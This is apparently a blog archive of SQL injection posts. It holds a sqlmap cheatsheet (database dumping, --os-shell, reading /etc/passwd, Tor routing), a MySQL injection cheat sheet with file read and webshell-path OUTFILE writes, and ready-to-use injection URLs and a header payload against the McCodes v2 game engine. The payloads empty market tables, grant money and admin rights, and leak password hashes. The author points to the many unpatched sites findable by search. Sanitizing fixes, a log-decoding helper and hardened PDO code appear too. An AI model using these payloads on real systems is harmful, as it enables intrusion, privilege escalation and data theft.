Category Archives: SQL Injection

My sqlmap cheatsheet

Check for injection + get DB / server info
POST: sqlmap.exe -u "http://site.com/authenticate.php" --method "POST" --data "username=admin&password=admin&submit=Submit"

GET: sqlmap.py -u "http://site.com/authenticate.php?username=admin&password=admin&submit=Submit" --method "GET"

get DB names
sqlmap.exe -u "http://site.com/authenticate.php" --method "POST" --data "username=admin&password=admin&submit=Submit" --dbs

get sql username
sqlmap.exe -u "http://site.com/authenticate.php" --method "POST" --data "username=admin&password=admin&submit=Submit" --current-user

get tables in specified DB
sqlmap.exe -u "http://site.com/authenticate.php" --method "POST" --data "username=admin&password=admin&submit=Submit" --tables -D social_mccodes

dump a table from specified db
sqlmap.exe -u "http://site.com/authenticate.php" --method "POST" --data "username=admin&password=admin&submit=Submit" -D social_mccodes -T users --dump

Other Info
--threads 10 (default is 1 thread; this greatly speeds it up)
--os-shell (get a shell)
--read-file=/etc/passwd (read a file's contents)
--forms (parse and test forms on the target URL)
--wizard (simple wizard interface for beginner users)
-v 3 (show payloads)
--tor (use the default Tor port)

My SQL Injection Cheat Sheet

//Select a string without using quotes
SELECT CHAR(110,101,121,61,109,111,110)
SELECT 0x39393939392C6D6F6E65793D6D6F6E65792B35 (alias for UNHEX('39393939392C6D6F6E65793D6D6F6E65792B35'))

//Map out fields
WHERE fieldname IS NOT NULL

//Map out tables
WHERE 1 = (SELECT COUNT(*) FROM tablename)

//read files (needs the FILE privilege)
select load_file("/etc/apache2/apache2.conf") -- 

//If the FILE privilege is granted and a directory is writable by the MySQL user
SELECT "" INTO OUTFILE "/var/www/html/temp/c.php"

McCodes SQL Injection – GET/POST Item Market

McCodes updates the Item Market in a “buy” action like so, without sanitizing the $_GET[‘ID’] variable:

$db->query("DELETE FROM itemmarket WHERE imID={$_GET['ID']}");

It also updates the "gift1" action in a similar way, though one page longer: it first accepts the variable via GET, embeds it as a hidden field in a form, then submits it in a POST.

To Inject:
There’s not too much we can do with this query as there are several ‘checkpoints’ it must pass (such as there being a valid item for sale that has been selected with our ID as input, the user having enough money for that item, etc.) So… let’s just empty the items table and keep it simple.

Example value:
Clears item market: itemmarket.php?action=buy&ID=0 or imID>0--
Clears item market: itemmarket.php?action=gift1&ID=0 or imID>0-- (just click Submit)

To fix:
Sanitize the variable.

$_GET['ID'] = abs((int) $_GET['ID']);

Many websites are vulnerable to this exploit. A simple google search for a default phrase on the login page brings up a list of websites with McCodes v2 installed, most of which are not patched (since there are no official patches).

General Info (mainly for Search Engines):
SQL Injection can result from ANY user input. This includes GET requests, POST requests, Cookies, and Headers, to name a few. The McCodes Game Engine v2 is vulnerable to several exploits / injections / hacks.

McCodes SQL Injection – GET Crystal Market Part 2

McCodes updates the Crystal Market in a “buy” action like so, without sanitizing the $_GET[‘ID’] variable:

$q=$db->query("SELECT * FROM crystalmarket cm WHERE cmID={$_GET['ID']}");
$r=$db->fetch_row($q);

$db->query("UPDATE users SET crystals=crystals+{$r['cmQTY']} where userid=$userid");

To Inject:
The crystalmarket table in the database looks like so:
`crystalmarket` (
`cmID` int(11),
`cmQTY` int(11),
`cmADDER` int(11),
`cmPRICE` int(11)
);
Moreover, the value selected from crystalmarket is then updated within the user table. Unfortunately, we cannot pass a string because McCodes has addslashes enabled on all $_GET and $_POST… or can we?
We can, using the CHAR command.
SELECT CHAR(57,57,57,57,57,44,109,111,110,101,121,61,109,111,110,101,121,43,53) outputs:
99999,money=money+5

EDIT: Other options that also select the same string:
SELECT UNHEX('39393939392C6D6F6E65793D6D6F6E65792B35')
SELECT 0x39393939392C6D6F6E65793D6D6F6E65792B35

Example values:

Adds $5 to your account:
cmarket.php?action=remove&ID=2 union all select 1,CHAR(57,57,57,57,57,44,109,111,110,101,121,61,109,111,110,101,121,43,53),0,0 --

Makes you an admin:
cmarket.php?action=remove&ID=2 union all select 1,CHAR(57,57,57,57,57,44,117,115,101,114,95,108,101,118,101,108,61,50),0,0 --
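The quote-free encodings used in the cheat sheet above and in this post (CHAR(...) lists, 0x... literals, UNHEX('...')) also show up in web server logs after the fact. The following triage helper is an added example, not code from the original posts or from McCodes: it decodes those literals out of logged request URLs and flags the keywords the posts rely on, so an analyst can read what a logged payload actually spelled. The access log lines at the bottom are constructed samples.

```php
<?php
// Added example, not from the original posts: decode CHAR(...) lists and hex literals
// found in request URLs and flag injection keywords. Sample log lines are constructed.

// Decode CHAR(57,57,...) lists and 0x.../UNHEX('...') hex found in a URL-decoded query string.
function decode_sql_literals(string $query): array {
    $found = [];
    if (preg_match_all('/CHAR\s*\(\s*([0-9\s,]+)\)/i', $query, $m)) {
        foreach ($m[1] as $list) {
            $codes = array_map('intval', preg_split('/\s*,\s*/', trim($list)));
            $found[] = implode('', array_map('chr', $codes));
        }
    }
    if (preg_match_all('/(?:\b0x|UNHEX\s*\(\s*[\'"]?)([0-9a-f]+)/i', $query, $m)) {
        foreach ($m[1] as $hex) {
            if (strlen($hex) % 2 === 0) {   // hex2bin needs an even number of digits
                $found[] = hex2bin($hex);
            }
        }
    }
    return $found;
}

// Classify one combined-format access log line. Returns null when nothing fired,
// otherwise the decoded URL, the keywords that matched, and any decoded literals.
function triage_log_line(string $line): ?array {
    if (!preg_match('/"(?:GET|POST) (\S+) HTTP\//', $line, $m)) {
        return null;
    }
    $url = urldecode($m[1]);
    $keywords = [];
    foreach (['union', 'select', 'load_file', 'outfile'] as $kw) {
        if (stripos($url, $kw) !== false) {
            $keywords[] = $kw;
        }
    }
    if (preg_match('/=\d+\s+or\s+\w+\s*[<>=]/i', $url)) {
        $keywords[] = 'tautology';   // e.g. "ID=0 or imID>0" from the Item Market post
    }
    $literals = decode_sql_literals($url);
    if ($keywords === [] && $literals === []) {
        return null;
    }
    return ['url' => $url, 'keywords' => $keywords, 'decoded' => $literals];
}

// Constructed sample lines: one carrying the CHAR() payload from this post, one benign.
$samples = [
    '198.51.100.7 - - [01/Jan/2024:10:00:00 +0000] "GET /cmarket.php?action=remove&ID=2%20union%20all%20select%201,CHAR(57,57,57,57,57,44,109,111,110,101,121,61,109,111,110,101,121,43,53),0,0%20-- HTTP/1.1" 200 512',
    '198.51.100.7 - - [01/Jan/2024:10:00:05 +0000] "GET /cmarket.php?action=buy&ID=2 HTTP/1.1" 200 1024',
];
foreach ($samples as $line) echo json_encode(triage_log_line($line)), "\n";
```

Run it with the PHP CLI against a real access log by replacing `$samples` with the file's lines; the first sample decodes to the `99999,money=money+5` string shown above, the second prints `null`.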

To fix:
Sanitize the variable.

$_GET['ID'] = abs((int) $_GET['ID']);


McCodes SQL Injection – GET Forums

McCodes default forums have a thread ID that is passed via GET when a reply is posted – and it’s not sanitized.

$q=$db->query("SELECT * FROM forum_topics WHERE ft_id={$_GET['reply']}");
$topic=$db->fetch_row($q);
$q2=$db->query("SELECT * FROM forum_forums WHERE ff_id={$topic['ft_forum_id']}");

To Inject:
First we put a nonsense ID that returns 0 rows. Then we do a union with a select statement of our own choosing. However… union requires the same number of columns in the two tables being put into union. No problem though! We just select one column repeatedly until we get the correct number of columns. As shown in the example below, even though you are only selecting one distinct column, you are selecting four columns total.
Select login_name,login_name,login_name,login_name FROM users where userid = 1

Example values:

//shows login name of userid=1
forums.php?reply=0 union all select login_name,login_name,login_name,login_name,login_name,login_name,login_name,login_name,login_name,login_name,login_name,login_name,login_name from users where userid=1

//shows MD5-hashed password of userid=1
forums.php?reply=0 union all select userpass,userpass,userpass,userpass,userpass,userpass,userpass,userpass,userpass,userpass,userpass,userpass,userpass from users where userid=1

To fix:
Sanitize the variable.

$_GET['reply'] = abs((int) $_GET['reply']);


McCodes SQL Injection – GET Crystal Market Part 1

McCodes updates the Crystal Market in a “buy” action like so, without sanitizing the $_GET[‘ID’] variable:

$q=$db->query("SELECT * FROM crystalmarket cm WHERE cmID={$_GET['ID']}");

To Inject:
The crystalmarket table in the database looks like so:
`crystalmarket` (
`cmID` int(11),
`cmQTY` int(11),
`cmADDER` int(11),
`cmPRICE` int(11)
);
So let's put in a nonsense value that returns 0 rows, followed by a union with a select statement that will select the values we want. The cmID doesn't matter; the cmQTY we presumably want a lot of; cmADDER can be anyone (but to avoid suspicion one can put an ID number that doesn't exist, like 0 or a negative number); and cmPRICE we want to be 0 (so it doesn't cost us anything).

Example value:
cmarket.php?action=buy&ID=2 union all select 1,99999999,0,0
cmarket.php?action=remove&ID=2 union all select 1,99999999,0,0 --

To fix:
Sanitize the variable.

$_GET['ID'] = abs((int) $_GET['ID']);


McCodes SQL Injection – IP Header

McCodes gets an IP Address like so:

$IP = ($_SERVER['HTTP_X_FORWARDED_FOR'])
    ? $_SERVER['HTTP_X_FORWARDED_FOR']
    : $_SERVER['REMOTE_ADDR'];

It then immediately uses it in an SQL query without sanitizing $IP. Note that X-Forwarded-For is a request header, so the client fully controls its value.

$db->query("UPDATE users SET lastip_login='$IP',last_login=unix_timestamp() WHERE userid={$mem['userid']}");

To Inject:
Download the Modify Headers add-on for Firefox. Change the X-Forwarded-For header value to something of your choosing.

Example value:
1', user_level='2',money=1337, username='bob

To fix:
Either sanitize the $IP variable, or change it to a server input (instead of client input).

$IP = $_SERVER['REMOTE_ADDR'];
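The fixes in the McCodes posts above all reduce to the same two rules: validate anything that arrives in $_GET or a header, and pass it to MySQL as a bound parameter rather than splicing it into the query string. The block below is an added example, not McCodes code: it shows the hardened forms of the integer-ID lookups (Item Market, Crystal Market, Forums), of the X-Forwarded-For lookup, and of the lastip_login UPDATE. It assumes a PDO connection in $pdo (hypothetical) and a list of known proxy addresses; the McCodes $db wrapper is not used.

```php
<?php
// Added example, not McCodes code: hardened forms of the patterns in the posts above
// (integer IDs from $_GET, the X-Forwarded-For lookup, and the lastip_login UPDATE).
// Assumes a PDO connection in $pdo (hypothetical); the McCodes $db wrapper is not used.
// Validate an ID from the query string. Returns null when absent or not a positive
// integer, so "0 or imID>0--" and "2 union all select ..." never reach a query.
function get_int_param(array $params, string $name): ?int {
    if (!isset($params[$name])) {
        return null;
    }
    $value = filter_var($params[$name], FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $value === false ? null : $value;
}

// Resolve the client IP. X-Forwarded-For is attacker-controlled text, so it is only
// consulted when the direct peer is a known proxy, and even then must parse as an IP.
function client_ip(array $server, array $trusted_proxies): string {
    $remote = $server['REMOTE_ADDR'] ?? '';
    $xff = $server['HTTP_X_FORWARDED_FOR'] ?? '';
    if ($xff !== '' && in_array($remote, $trusted_proxies, true)) {
        $first = trim(explode(',', $xff)[0]);   // leftmost entry is the original client
        if (filter_var($first, FILTER_VALIDATE_IP) !== false) {
            return $first;
        }
    }
    return $remote;
}

// Crystal market "buy": the ID is bound as a parameter and only cmQTY from the matching
// row is credited, so no attacker-chosen row can be unioned into the result.
function buy_crystals(PDO $pdo, array $get, int $userid): bool {
    $cmID = get_int_param($get, 'ID');
    if ($cmID === null) {
        return false;
    }
    $stmt = $pdo->prepare('SELECT cmQTY FROM crystalmarket WHERE cmID = :id');
    $stmt->execute([':id' => $cmID]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    if ($row === false) {
        return false;   // no such listing, nothing to credit
    }
    $upd = $pdo->prepare('UPDATE users SET crystals = crystals + :qty WHERE userid = :uid');
    return $upd->execute([':qty' => (int) $row['cmQTY'], ':uid' => $userid]);
}
// Login bookkeeping with the IP passed as data rather than spliced into the SQL string.
function record_login(PDO $pdo, int $userid, string $ip): bool {
    $sql = 'UPDATE users SET lastip_login = :ip, last_login = UNIX_TIMESTAMP() WHERE userid = :uid';
    return $pdo->prepare($sql)->execute([':ip' => $ip, ':uid' => $userid]);
}
```

Call `record_login($pdo, $userid, client_ip($_SERVER, ['10.0.0.1']))` in place of the original UPDATE; with an empty trusted-proxy list the function always returns REMOTE_ADDR, which is the post's own fix.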


SQL Injection

Firefox Add-on: SQL Inject Me.

Automatically runs a plethora of tests, immediately displays results.